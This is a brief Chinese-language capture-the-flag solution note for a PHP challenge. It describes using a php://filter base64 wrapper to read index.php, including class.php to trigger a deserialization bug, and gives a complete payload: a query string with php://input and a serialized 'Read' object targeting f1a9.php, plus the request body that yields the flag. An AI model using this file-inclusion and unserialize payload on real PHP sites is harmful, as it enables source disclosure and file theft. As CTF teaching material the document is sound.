首先要用php://filter/convert.base64-encode/resource=index.php把index.php的完整原始代码获取到手,注释里的是不完整的,然后你要用file参数把class.php包含进去,才能触发反序列化漏洞,但是他这个环境有问题,如果你把代码部署到本地,用payload:?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:52:"php://filter/convert.base64-encode/resource=f1a9.php";} 请求体里面是the user is admin是可以获取到flag的